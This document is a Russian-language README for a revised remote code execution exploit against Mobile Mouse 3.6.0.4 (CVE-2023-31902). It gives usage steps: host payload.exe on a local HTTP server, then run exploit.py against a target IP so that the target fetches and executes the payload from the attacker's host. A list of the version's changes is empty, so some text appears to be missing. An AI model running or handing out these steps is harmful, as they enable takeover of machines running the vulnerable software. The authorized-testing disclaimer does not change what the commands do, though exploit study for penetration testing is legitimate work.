
Mobile Mouse 3.6.0.4 - Удалённое выполнение кода - CVE-2023-31902
Исправленная версия эксплойта удалённого выполнения кода Mobile Mouse 3.6.0.4, опубликованного как EDB-51010.
Исходный эксплойт успешно загружает полезную нагрузку, но может не выполнить её, поскольку обе стадии используют одно и то же TCP-соединение.
Эта версия:
Кроме того, в нём используются sendall(), корректно экранированные пути Windows, тайм-ауты сокетов и базовая обработка ошибок.
Запустите HTTP-сервер в каталоге с полезной нагрузкой:
python3 -m http.server 8080
Запустите эксплойт:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Этот проект предназначен только для авторизованного тестирования безопасности и образовательных исследований. Не используйте его против систем без явного разрешения.